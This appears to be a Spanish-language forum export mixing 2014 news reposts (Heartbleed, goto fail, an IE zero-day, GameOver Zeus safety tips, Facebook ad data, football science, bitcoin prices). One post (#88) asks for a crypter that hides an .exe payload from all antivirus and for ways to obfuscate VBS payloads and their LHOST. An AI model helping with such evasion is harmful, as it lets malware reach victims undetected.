Recopile el código en codeblock, para ver  cuál era la línea de código del error, solo logre ver que la línea 24 queda, donde aparece el texto en arteriscos al final pero no se cual es el carácter 13

Que parte del código debo modificar para que funcione?
#85
El agregador de noticias Feedly se convirtió en la última de víctima de los hackers. La empresa informó que un ataque en la red impide a sus usuarios acceder a sus servicios.


Hackers impidieron a Evernote y a Feedly prestar sus servicios.

A través de su blog, la empresa informó que los perpetradores "están extorsionándonos para obtener dinero", solo así estarían dispuestos a revertir el daño que han causado. Pero los representantes de Feedly se negaron a pagar.

Algo muy similar le ocurrió al popular servicio de organización de información Evernote. No son los primeros ataques que llevan a cabo criminales cibernéticos que ocurren este año, y lo más probable es que tampoco sean los últimos.
A continuación, BBC Mundo le presenta tres de los más importantes que han tenido lugar en 2014.

Heartbleed

Las alarmas informáticas se activaron alrededor del 8 de abril. Expertos en seguridad cibernética advirtieron que se trataba de uno de los errores de programación (bug, en inglés) más peligrosos de los últimos años y recomendaron a los usuarios de internet cambiar sus contraseñas.
Heartbleed es una falla en el sistema que se utiliza para cifrar información personal que circula en la red y que puede incluir datos financieros y médicos. El rango de aspectos expuestos es amplio y difícil de determinar porque el error del software le permite a los atacantes ver parte de la información que se quedó en la memoria del servidor.
El mecanismo que protege los datos cuando pasan de un punto es conocido como SSL/TLS y es muy común, por lo que Google, Yahoo, Facebook, Tumblr, Amazon Web Services y otras importantes compañías que funcionan con este sistema, estuvieron en riesgo.


Las contraseñas de millones de usuarios estuvieron, y pueden seguir
estando en riesgo, con Heartbleed.

"17% de sitios web fueron atacados, lo que equivale a más de medio millón. Pero podrían ser muchos más, el problema en este caso es que el fallo puede producirse sin ser detectado porque quienes manejan los sitios web quizás no encontraron evidencia del ataque", le explicó a BBC Mundo Paul Mutton, de Netcraft, una empresa que ofrece servicios de seguridad informática.
Pocos días después de que se supo acerca de la amenaza de Heartbleed, el organismo impositivo canadiense, Canada Revenue Agency, reveló que el número de seguro social de 900 personas fue sustraído de sus sistemas.
Mientras que Mumsnet, un sitio web británico para madres, confirmó que contraseñas y mensajes personales enviados por sus miembros aparecieron en internet.

Goto fail

A mediados de abril Apple hizo pública una actualización de su sistema operativo OS X, porque descubrió que sus usuarios podrían ser víctimas de hackers al utilizar internet, en un caso similar al de Heartbleed.
El problema estaba en la conexión que se establece entre el navegador de Apple, Safari, y varios sitios web, entre los que se cuentan bancos, Google y Facebook. La gran mayoría de los websites cuenta con un sistema de seguridad que protege la información que circula en la red.
Pero este mecanismo quedó expuesto por la falla que afectó a los propietarios de modelos de iPhone, iPad, iPod y computadoras de Apple que funcionan con OS X.
"Al saber que existe este error, el atacante podría interceptar la comunicación entre los usuarios y los sitios web que visiten, robando sus contraseñas y nombres de usuarios. También podría volver a cifrar los datos obtenidos y distribuirlos como quisiera. Es lo que se conoce como el ataque del 'hombre en el medio'", le dijo a la publicación especializada MIT Technology Review Simson Garfinkel, experto en seguridad informática.


Los errores de las versiones de Internet Explorer que van del número
6 al 11 afectaron a quienes tienen Windows XP.

"Zero-day exploit" (CVE-2014-1776)

La seguridad y confiablidad de las diferentes versiones del navegador de Microsoft, Internet Explorer –que van desde la 6 hasta la 11- se pusieron en duda los últimos días de abril.
Un error de programación permitió que hackers pudieran tomar control de computadoras que funcionan con el sistema operativo Windows XP.
Para desespero de los usuarios, la falla, cuya existencia fue confirmada por la empresa de seguridad informática Symantec, "congelaba" la pantalla de quienes recurrían a Explorer para utilizar internet.
El sitio de estadísticas de tecnología en internet, NetMarket Share, calcula que más del 50% del mercado mundial de navegadores emplea Explorer.
Mientras que algunos especialistas estiman que alrededor de 30% de computadoras de escritorio utilizan Windows XP, lo que convierte a sus propietarios en potenciales víctimas.
Cambiar de navegador fue una de las principales opciones para disminuir el riesgo en el momento, recomendada incluso por el gobierno estadounidense. Con respecto al sistema operativo, una actualización podría ayudar.

http://www.bbc.co.uk/mundo/noticias/2014/06/140611_tecnologia_efectos_ataques_ciberneticos_kv.shtml
#86
¿Por qué España perdió frente a Holanda? Visión científica sobre el fútbol y el Mundial



¿Alguien puede explicar por qué España cayó de esa forma ante Holanda? Física, psicología, aerodinámica: les presentamos las mejores investigaciones científicas y descubrimientos relacionados con el fútbol en su conjunto y con el Mundial en concreto.

Caída de estrellas deportivas


Investigadores franceses, que publicaron su trabajo en la revista 'Psychological Science', descubrieron que un 'equipo de ensueño', formado por estrellas, a menudo muestra resultados mediocres. Su investigación fue importante no solo para el fútbol, sino también para los deportes de equipo, en particular, a lo referente con la Asociación Nacional de Baloncesto (NBA).

Los científicos afirman que las estrellas coordinan mal sus acciones, tienden a actuar por su cuenta, lo que resulta en un desastre para todo el equipo.

Según estos psicólogos franceses, es probable que los equipos formados por estrellas abandonen el Mundial en Brasil ya en el inicio. Sin embargo, los investigadores no especificaron qué equipos tenían en mente. Después de la humillante derrota de España frente a Holanda su idea queda más clara.

Juego browniano


Científicos japoneses, cuyo artículo fue publicado en la revista 'European Physical Journal B', demostraron que un partido de fútbol es similar al movimiento browniano, movimiento aleatorio de partículas muy pequeñas de materia bajo la influencia de las colisiones de las moléculas.

Primero en base teórica, y luego en la práctica, los científicos fueron capaces de demostrar que en el fútbol, como en el movimiento browniano, no se puede predecir nada después de unas pocas decenas de segundos.

Según los investigadores, esto muestra claramente la ventaja del fútbol sobre otros tipos de deportes: el hockey, el baloncesto, el béisbol, etc.

Brazuca en el túnel de viento


Investigadores australianos estudiaron las capacidades del balón oficial del Mundial, el Brazuca. Además, lo compararon con el Jabulani de Sudáfrica, ambos fabricados por Adidas.

Como resultado, ocurrió que la pelota anterior tenía una trayectoria imprevisible. Los investigadores metieron al Brazuca en el túnel de viento durante casi un mes y encontraron que es mucho más adecuado para el fútbol que su predecesor.

Según los científicos, las ranuras presentes en la superficie de Brazuca proporcionan coincidencia de la trayectoria del vuelo de la bola con la dirección del impacto. Así que ahora para los atacantes será más fácil dar en el blanco que antes.

http://actualidad.rt.com/deporte/view/131064-futbol-razon-perdida-espana-ciencia
#87
Facebook dio un paso más en la dirección de obtener beneficios comerciales aprovechándose de las vidas de sus usuarios y aseguró que permitirá a los anunciantes obtener datos de los hábitos de navegación en la red social.



Facebook acaba de anunciar que planea compartir los historiales de navegación de sus usuarios con las empresas anunciantes con el propósito de que la publicidad llegue con más efectividad a los internautas, informa el diario de negocios 'Wall Street Journal'.

"Lo que hemos escuchado de la gente es que quiere una publicidad dirigida más específicamente hacia ellos", dijo Brian Boland, vicepresidente de Facebook a cargo de los anuncios de marketing de producto. "El objetivo es dejarle claro a la gente por qué vio el anuncio", agregó.

Facebook permitirá a sus usuarios ver los expedientes de gustos e intereses que tiene sobre ellos y cambiar información contenida en esos archivos. Y si no le gusta el anuncio que le envían, el usuario también será capaz de elegir qué tipo de mensajes de marketing prefiere ver.

Los datos de los usuarios de la compañía, con sede en Silicon Valley, se basan principalmente en las actividades de la gente en su sitio, como por ejemplo darle 'Me gusta' a páginas de marcas o compartir un anuncio divertido. Los usuarios "quieren expectativas muy claras y quieren tener control sobre la publicidad que ven", destaca Brian Boland. 

Mientras tanto, los defensores de la privacidad expresaron su preocupación y varios pidieron que la Comisión Federal de Comercio examine la decisión. El acuerdo de Facebook con la Comisión requiere avisar a los consumidores y obtener el consentimiento antes de compartir información. 

http://actualidad.rt.com/sociedad/view/131072-facebook-venta-datos-personales-usuarios
#88
Googleando un poco encontre ete hilo del foro que es de 2007 http://foro.elhacker.net/analisis_y_diseno_de_malware/ultima_hora_themida_desaparece_de_la_base_de_datos_del_nod32-t179527.0.html

Busque algun cripter googleando que funcione, al 100% para todos los antivirus y parece ser que no hay ninguno, estoy tratando de cifrar un payload .exe, alguien sabe de alguno que funcione al 100% para todos lo antivirus.

Los payloads en VBS Script solo 2 antivirus me lo detectan, pero el codigo y el LHOST queda expuesto, existe algun metodo para cifrar en VBS?

He viso sobre el Script Encoder pero "it will not prevent the determined hacker from seeing what you've done and how" es lo que se indica en la documentacion de esta herramienta, lo que indica que el codigo del script podria visualizarse.
#89
¿Cómo pueden protegerse de crímenes cibernéticos los usuarios? La pregunta ha salido nuevamente a colación luego de que el Buró Federal de Investigaciones estadounidense, (FBI, por sus siglas en inglés), descubriera que más de un millón de computadores fueron afectados en todo el mundo por lo que se considera el mayor y más peligroso virus detectado.


Los expertos instan a tener cuidado, en particular con los correos electrónicos

Se trató, según las autoridades, de un crimen cibernético de largo alcance que afectó a individuos y negocios en todo el mundo.

La amenaza, según el FBI, provenía del virus GameOver Zeus, conocido también como GOZeus o P2PZeus. Se trata de un malware agresivo que infecta computadores, hasta tal punto que éstos pueden ser controlados remotamente por criminales.
Las autoridades instaron a los usuarios de internet a tomar medidas para protegerse de esta amenaza. En Reino Unido, la Agencia Nacional contra el Crimen advirtió que quienes están detrás del virus, podrían reactivarlo en unas dos semanas.
¿Pero qué pueden hacer exactamente los usuarios para protegerse de esta amenaza?
Protección antivirus

La recomendacion principal de los expertos parece muy obvia: adquiera protección antivirus, pero el organismo británico que se encarga de alerta ante ataques cibernéticos, CERT UK, señala que en esta ocasión es de vital importancia que el antivirus esté actualizado.
"Asegúrate de que el antivirus esté al día y mantenlo activo todo el tiempo".


Se cree que al menos un millón de computadores en todo el mundo fueron afectados.

Correos electrónicos

Una forma común de infectar tu computador es mediante un correo electrónico que te llega supuestamente de alguien conocido o confiable, por ejemplo de un organismo oficial.
Por eso, lo mejor es que no abras documentos adjuntos, ni hagas clicks en vínculos que recibas por este medio, a menos que estés 100% seguro de dónde provienen.

Sistema operativo

Asegúrate de actualizar el sistema operativo de tu computador. "Recuerda que actualizar el sistema operativo y el software es buen hábito y deberías hacer esto con regularidad", señala el sitio de la Agencia Nacional contra el Crimen de Reino Unido.

Actualizar programas

Los expertos también recomiendan que mantengas actualizados los programas o softwares que tienes instalados en el computador. La versión actualizada del software normalmente tiene los mecanismos de seguridad más efectivos.

Copia de archivos

Haz copia de tus archivos, incluyendo documentos, fotos, música, y de tus documentos favoritos en internet. "Mantén esta copia a mano, en caso de que de repente no puedas accederlos en tu computador", recomienda el sitio británico.


El FBI señaló que la operación de este lunes fue sin precedentes

Contraseña

Nunca salves contraseñas en tu computador en caso de que puedan ser accedidas por los cibercriminales.
Las autoridades británicas también recomendaban este lunes cambiar todas las contraseñas. "Tus contraseñas pueden haber sido hackeadas durante la infección, así que lo mejor es cambiarlas".

Herramientas gratuitas

En Reino Unido también se estaba recomendando a los usuarios que bajaran herramientas gratuitas contra el virus GameOver Zeus del sitio oficial británico de internet clic Get Safe Online. Empresas como Symantec, F-Secure, Kaspersky, Sophos, Heimdal Security, entre otras, están ofreciendo temporalmente herramientas libre de cargos para protegerse de esta última amenaza.

http://www.bbc.co.uk/mundo/noticias/2014/06/140603_tecnologia_ataque_cibernetico_mes.shtml
#90
Comprar bitcoins. Hace sólo unos meses todo el mundo hablaba de la impresionante revalorización que habían tenido las monedas virtuales, especialmente el bitcoin, la más exitosa de todas. Sin embargo, cuando tocó sus máximos en los últimos compases del año pasado en 1.100 dólares, emprendió una espiral bajista que le llevó hasta los 400.


Bitcoin /Reuters

Un derrumbe que desató las dudas sobre las monedas virtuales y abrió la caja de pandora para hablar abiertamente de la burbuja del bitcoin. Pero en las últimas semanas han conseguido replicar estas sospechas y hoy cotiza en el entorno de los 660 dólares. De esta forma, las pérdidas en el año se limitan al 15,2% frente a la evolución del dólar. Ha perdido de esta forma el trono que le acreditaba como la peor inversión del año. Eso sí, se mantiene entre las peores inversiones del año.
Porque aún peor que el bitcoin se han comportado el hierro, acuciado por la debilidad de la demanda del sector industrial de China. Tampoco les han ido bien las cosas a quienes invirtieron a comienzos de año en plomo, carbón o cobre. Igualmente, divisas como el peso argentino se sitúan entre las apuestas menos rentables del año.
La plata, con un descenso en su precio del 1,90%, el barril de crudo Brent, que se ha abaratado el 2,13%, o el gasóleo, con un recorte del 6,30%, también se sitúan entre las inversiones más desacertadas del presente curso.
En cuanto a la renta variable, la tónica es positiva en la mayoría de índices bursátiles. Ahora bien, hay excepciones. La principal es el Nikkei japonés, que en lo que va de año se ha desplomado el 7,44% como consecuencia de la falta de confianza por parte de los inversores en el nuevo programa económico nipón conocido como Abenomics. También el Hang Seng y la bolsa mexicana se precipitan hacia los números rojos, aunque de forma mucho más moderada, con rebajas del 0,84% y del 1,18%, respectivamente.
En este gráfico se pueden apreciar las peores inversiones hasta mayo y las pérdidas que han tenido hasta la fecha.



[Te interesará: La única manera para llegar a ser verdaderamente muy rico]
En el polo opuesto se sitúan mercados como el MIB italiano, que se alza un 15,7%, o el Ibex 35, con un ascenso del 9,68%. También la bolsa de Canadá se anota ganancias relevantes, con un repunte del 8,8%. El Cac francés sube el 5,88%, el Eurostoxx el 5,08%, el S&P 500 el 4,98%, el Dax alemán el 4,14% o el Dow Jones el 1,52%. El FTSE 100 londinense suma el 0,54%.
Ahora bien, la mejor inversión del año –excluyendo valores bursátiles concretos- es el café, con una revalorización del 52,5%. Le siguen el paladio (+17,1%), las habas (+11,4%), el gas natural (+10,7%), el maíz (+6,4%), la gasolina (+5,6%), el platino (+5,3%), el oro (+4,5%), el barril de crudo Texas (+3,94%), el azúcar (+2,5%), el aluminio (+1,93%) y el algodón (+1,09%).

https://es.finance.yahoo.com/blogs/historiasparanoquebrar/la-ruina-del-bitcoin-a%C3%BAn-hay-peores-inversiones-144123292.html